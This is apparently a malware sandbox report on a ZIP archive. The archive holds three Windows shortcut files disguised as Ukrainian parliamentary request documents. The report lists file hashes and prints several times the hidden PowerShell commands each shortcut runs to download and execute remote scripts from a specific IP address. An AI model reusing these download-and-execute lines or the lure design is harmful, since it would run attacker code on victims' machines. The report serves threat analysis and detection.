8a6d715d998459360a3a230711bef80e
ZIP Archive | MD5: 8a6d715d998459360a3a230711bef80e | Size: 467.05 KB | application/zip
|
Hash | Hash Value |
|---|---|
| MD5 | 8a6d715d998459360a3a230711bef80e
|
| Sha1 | 2ec60b598afbf860f633bec88e906e3bd71b9929
|
| Sha256 | a1e2620cff9e1612e0f50d13b3d9f0295079cd4e7b6b8a338a3a39aa8fd2c7c2
|
| Sha384 | 87797783649255c05e8779c8d3c46e6bc5b8b1d8a048993629a2da829ffb29f46576f269505269e9cd9af4b7243e724a
|
| Sha512 | 69e107f4b4999a20262831cfd9dc2e9ae095037380acd971b78c5c6c649ec83ce892a506d6f8d1b154e7c4815d59a65fbc43c1b2fbd93c82ff58f621824f8495
|
| SSDeep | 96:Yc3+udf7i4A268YY+/+udf7i438Vhka+udf7i468F3G+5kH:Yo+udf7i4uxL+udf7i43Mb+udf7i46o2
|
| TLSH | 09A4E024A3F51F08F1B7AA7E9D7A2B5888727B1CDB21D74C0214A0891C71B54E835F3B
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://146.185.239.63/k4s/tracekitten.ps1') }))) |
| LNK: Command Execution | powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://146.185.239.63/k4s/ospreybonfire.ps1') }))) |
| LNK: Command Execution | powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://146.185.239.63/k4s/violabanner.ps1') }))) |
| Deobfuscated PowerShell | -w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://146.185.239.63/k4s/ospreybonfire.ps1")))) |
| Deobfuscated PowerShell | shortcut: headersize: 76 76 linkclsid: "00021401-0000-0000-c000-000000000046" linkflags: @("HasLinkTargetIDList", "HasName", "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode", "ForceNoLinkInfo") fileattributes: 0 creationtime: "11/17/2025" "10:08:21" "PM" accesstime: "11/17/2025" "10:08:21" "PM" writetime: "11/17/2025" "10:08:21" "PM" filesize: 0 0 iconindex: 85 showcommand: "SW_SHOWMINNOACTIVE" hotkey: 0 linktargetidlist: idlistsize: 395 395 displayname: "powershell" path: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" stringdata: namestring: "Rich" "????xt" "D??cument" workingdir: "%LOCALAPPDATA%" commandlinearguments: -w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://146.185.239.63/k4s/ospreybonfire.ps1")))) iconlocation: "imageres.dll" |
| Deobfuscated PowerShell | -w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://146.185.239.63/k4s/tracekitten.ps1")))) |
| Deobfuscated PowerShell | -w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://146.185.239.63/k4s/violabanner.ps1")))) |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://146.185.239.63/k4s/tracekitten.ps1') }))) Malicious |
8a6d715d998459360a3a230711bef80e > Dodatok_do_zapitu.xlsx.lnk |
| LNK: Command Execution | powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://146.185.239.63/k4s/ospreybonfire.ps1') }))) Malicious |
8a6d715d998459360a3a230711bef80e > Scan_zapitu_iz_verhovnoi_radi.rtf.lnk |
| LNK: Command Execution | powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://146.185.239.63/k4s/violabanner.ps1') }))) Malicious |
8a6d715d998459360a3a230711bef80e > Zapit_iz_verhovnoi_radi.docx.lnk |
| Deobfuscated PowerShell | -w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://146.185.239.63/k4s/ospreybonfire.ps1")))) Malicious |
8a6d715d998459360a3a230711bef80e > Scan_zapitu_iz_verhovnoi_radi.rtf.lnk > LNK CommandLine |
| Deobfuscated PowerShell | shortcut: headersize: 76 76 linkclsid: "00021401-0000-0000-c000-000000000046" linkflags: @("HasLinkTargetIDList", "HasName", "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode", "ForceNoLinkInfo") fileattributes: 0 creationtime: "11/17/2025" "10:08:21" "PM" accesstime: "11/17/2025" "10:08:21" "PM" writetime: "11/17/2025" "10:08:21" "PM" filesize: 0 0 iconindex: 85 showcommand: "SW_SHOWMINNOACTIVE" hotkey: 0 linktargetidlist: idlistsize: 395 395 displayname: "powershell" path: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" stringdata: namestring: "Rich" "????xt" "D??cument" workingdir: "%LOCALAPPDATA%" commandlinearguments: -w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://146.185.239.63/k4s/ospreybonfire.ps1")))) iconlocation: "imageres.dll" Malicious |
8a6d715d998459360a3a230711bef80e > Scan_zapitu_iz_verhovnoi_radi.rtf.lnk > [Lnk Summary] |
| Deobfuscated PowerShell | -w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://146.185.239.63/k4s/tracekitten.ps1")))) Malicious |
8a6d715d998459360a3a230711bef80e > Dodatok_do_zapitu.xlsx.lnk > LNK CommandLine |
| Deobfuscated PowerShell | -w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://146.185.239.63/k4s/violabanner.ps1")))) Malicious |
8a6d715d998459360a3a230711bef80e > Zapit_iz_verhovnoi_radi.docx.lnk > LNK CommandLine |